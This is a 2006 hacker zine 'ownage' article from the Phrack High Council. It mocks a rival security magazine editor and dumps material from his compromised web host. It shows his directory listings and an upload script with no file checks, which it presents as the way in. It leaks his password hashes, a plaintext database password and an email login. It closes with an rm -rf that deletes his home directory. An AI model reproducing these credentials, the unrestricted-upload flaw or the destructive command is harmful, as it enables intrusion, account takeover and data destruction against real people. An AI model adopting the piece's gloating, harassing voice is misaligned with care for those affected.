|=-----------=[ C O N T A C T P H R A C K H I G H C O U N C I L ]=---------=|
Editors : phc at phrack.ru
Submissions : phc at phrack.ru
Commentary : phc at phrack.ru
Phrack World News : phc at phrack.ru
Warez Submissions : phc at phrack.ru
...
#, . .P
hr, . .. .Ac
'K#ph, .. . .rAcK'
#ph'Rac, . . .K#P'Hra
Ck' #PHr ... .aCk' #Ph
rA, 'cK#, .pHr' .AC
'K# 'Phr, .aCk' #P'
... rAc ' .K.#P Hra ...
. cK# .pHR .a, cK# .
. .. pH, .rAc' . 'k#P .HR . ..
.. . 'Ac .K#' . 'PHr. '' .. .
. . aCk ' . '#PH, . .
... .rA.'cK' . .. '#PH, ...
.rAc' k#, ..... .PH 'rAc,
.K#P' 'Hr . aC' 'k#P,
.hRa' cK# . pHr 'aCk,
.#Ph'____________________________ rAc ______________'K#P,
.HRACK#PHRACK#PHRACK#PHRACK#PHRACK#'.PH RAC#PHRACK#PHRACK#PHRa.
... cK'
#Pr aCk
#Ph rAc
K#, .Ph
'RA CK'
#P. .hR
aC.K#
PhR
A
[-]=====================================================================[-]
<_daemon@mail.ru> to phc
I hear for you phrack versioning of the phrack.org, i'm interested on
reopen the original magazine, i represent the staff of aristotle and the mentor
and create a new magazine with the same fidelity of phrack magazine but with another
name: the crackenfind magazine on the url www.consultorioinformatico.info has a part of
Consultorio Networks. he webpage is iopen in this week and the first number is
ready, i glad to invitate to colaborate in crackenfind magazine, i pernally glad to
participate on your magazine as the same.
thanks and bye
AzRaEL [NuKE]
represent the staff of aristotle and the mentor
Member of AntiOnline, fr33d0m, astalavista, 2600 Brain Damage, el-hacker ,
c-group, itfreaks, consultorioinformatico and some others communities. Dedicate
all 25 hours at day to investigate and coding for security audits. Hacker hunter
and many years virus writter.
----------------------------------------------------------------------------------------
to <_daemon@mail.ru>
PHC would gladly like to contribute to your magazine, our article is intitled
"How we owned you", we do hope you enjoy the article and consider it for publishing.
---------
CONTENTS:
0x00 - your public_html/
0x06 - your ~/home
0x06 - How we did it.
0x06 - passwdz
0x01 - rm -rf ~/
---------
-0x00 - your public_html/
# ls -al
drwxr-x--- 18 p2005266 nobody 4096 Apr 19 16:46 .
drwx--x--x 14 p2005266 p2005266 4096 Apr 19 16:45 ..
-rw-r--r-- 1 p2005266 p2005266 86 Nov 20 18:22 .htaccess
d--------- 2 p2005266 p2005266 4096 Jan 19 15:03 CdbRwS
drwxr-xr-x 2 p2005266 p2005266 4096 Jan 19 15:03 _private
drwxr-xr-x 4 p2005266 p2005266 4096 Jan 19 15:03 _vti_bin
drwxr-xr-x 2 p2005266 p2005266 4096 Jan 19 15:03 _vti_cnf
drwxr-xr-x 2 p2005266 p2005266 4096 Jan 19 15:03 _vti_log
drwxr-x--- 2 p2005266 nobody 4096 Apr 16 21:38 _vti_pvt
drwxr-xr-x 2 p2005266 p2005266 4096 Jan 19 15:03 _vti_txt
drwxr-xr-x 4 p2005266 p2005266 4096 Apr 19 06:49 archives
drwxr-xr-x 2 p2005266 p2005266 4096 Apr 19 00:13 cgi-bin
drwxr-xr-x 2 p2005266 p2005266 4096 Apr 18 23:23 cracken__
-rw-r--r-- 1 p2005266 p2005266 10889 Apr 18 23:22 editor.php
-rw-r--r-- 1 p2005266 p2005266 9790 Apr 19 00:24 forums.php
drwxr-xr-x 2 p2005266 p2005266 4096 Apr 19 16:46 hardsoft
drwxr-xr-x 2 p2005266 p2005266 4096 Apr 19 00:20 images
-rw-r--r-- 1 p2005266 p2005266 12027 Apr 19 06:53 index.php
drwxr-xr-x 4 p2005266 p2005266 4096 Apr 18 23:25 magazine
drwxr-xr-x 5 p2005266 p2005266 4096 Apr 19 01:12 news
drwxr-xr-x 2 p2005266 p2005266 4096 Apr 19 20:25 upload
-rw-r--r-- 1 p2005266 p2005266 5758 Apr 19 02:08 upload.php
drwxr-xr-x 2 p2005266 p2005266 4096 Apr 18 23:42 who
0x06 - your ~/home
# ls -al ~
drwx--x--x 14 p2005266 p2005266 4096 Apr 19 16:45 .
drwx--x--x 539 root root 20480 Apr 19 13:08 ..
-rw-r--r-- 1 p2005266 p2005266 204 Apr 16 00:09 .addon-installlog
-rw------- 1 p2005266 p2005266 17 Apr 16 00:08 .addonscgi-MamboOpenSource
-rw------- 1 p2005266 p2005266 19 Apr 16 00:09 .addonscgi-cPSupport
-rw------- 1 p2005266 p2005266 0 Aug 14 2005 .bash_history
-rw-r--r-- 1 p2005266 p2005266 304 Jan 19 15:50 .bash_logout
-rw-r--r-- 1 p2005266 p2005266 191 Jan 19 15:50 .bash_profile
-rw-r--r-- 1 p2005266 p2005266 124 Jan 19 15:50 .bashrc
-rw------- 1 p2005266 p2005266 19 Jan 3 02:41 .contactemail
drwx------ 2 p2005266 p2005266 4096 Apr 19 16:45 .cpanel-datastore
-rw-r--r-- 1 p2005266 p2005266 383 Jan 19 15:50 .emacs
drwxr-xr-x 2 p2005266 p2005266 4096 Jan 19 15:04 .fantasticodata
drwxr-xr-x 4 p2005266 p2005266 4096 Apr 17 09:02 .htpasswds
-rw------- 1 p2005266 p2005266 13 Apr 19 16:45 .lastlogin
-rw-r--r-- 1 p2005266 p2005266 36 Nov 18 03:03 .mailboxlist
drwx------ 2 p2005266 p2005266 4096 Apr 12 01:01 .sqmaildata
drwx------ 2 p2005266 p2005266 4096 Apr 16 21:56 .trash
drwxr-xr-x 2 p2005266 p2005266 4096 Apr 18 23:11 cracken__
drwxr-x--- 3 p2005266 mail 4096 Apr 19 16:46 etc
-rw-r--r-- 1 p2005266 p2005266 655 Aug 9 2005 index.htm
drwxrwx--- 3 p2005266 mail 4096 Apr 12 01:01 mail
drwxr-x--- 3 p2005266 p2005266 4096 Apr 17 09:03 public_ftp
drwxr-x--- 18 p2005266 nobody 4096 Apr 19 16:46 public_html
drwx------ 3 p2005266 p2005266 4096 Apr 12 02:22 ssl
drwxr-xr-x 7 p2005266 p2005266 4096 Jan 19 15:04 tmp
lrwxrwxrwx 1 root root 11 Jan 19 15:51 www -> public_html
0x06 - How we did it.
"Dedicate all 25 hours at day to investigate and coding for security audits."
----
your fucking amazing if you can spend 25hours a day being a hacker hunter, and
auditing code, maybe you should audit your own code?
# cat upload.php
<?
if($_POST[enviar]) {
if($_FILES[archivo][size] <= 100000) {
move_uploaded_file($_FILES[archivo][tmp_name],'upload/'.$_FILES[archivo][name]) ;
echo 'The file has been uploaded sussesfull !!!' ;
} else {
echo 'El archivo supera los 100 Kb.' ;
}
//LOOK WE PERFROM NO FILE CHECKZ PLEASE HAQ US!
}
?>
<form method="post" action="=$_SERVER[PHP_SELF]?>"
enctype="multipart/form-dat a">
<input type="file" name="archivo">
<input type="submit" name="enviar" value="submit">
</form>
</center>
<BR>
<left>
<span class="Estilo3">Note: The articles subbmitted has passed for
staff revision and take a lot of time for aproved and publish. CrackenFind reserve
the right for publish or not this submision.
</left>
<BR>
<left>
<span class="Estilo3">CrackenFind Staff
</left>
-------------
0x06 - passwdz
//FRONT PAGE PASSWDZ
# -FrontPage-
administrators: p2005266
authors:
p2005266:5mp6MyvoH6sto
vti_encoding:SR|utf8-nl
ValidEndUsers:false
UseDfltRealm:false
vti_encoding:SR|utf8-nl
//ACCOUNT PASSWDZ
-bash-3.00# grep p2005266 /etc/shadow
p2005266:$1$8na.ab34$28mnOIPJcL7R3T9PwPMjN.:13254:0:99999:7:::
//CPANEL PASSWDZ
crackenfind:$1$S4c9pql5$2UcbzqP1nsXaU9J/JyWq81:::::::
//MYSQL ANYBODY?
$db_name = "p2005266_news";
$db_user = "p2005266_azrael";
$db_passwd = "killflesta";
$db_server = "localhost";
//EMAIL^$#
eng.mail.ru user _daemon / pass l0ck3d
Click Here -> (X)
0x01 - rm -rf ~/
//oopz. i slipped.
-bash3.00# rm -rf /home/p2005266/
-------------------------------------------------------------------
PHC hopes this article helps you and is published in your "security" magazine.
- Phrack High Council, 2006 AD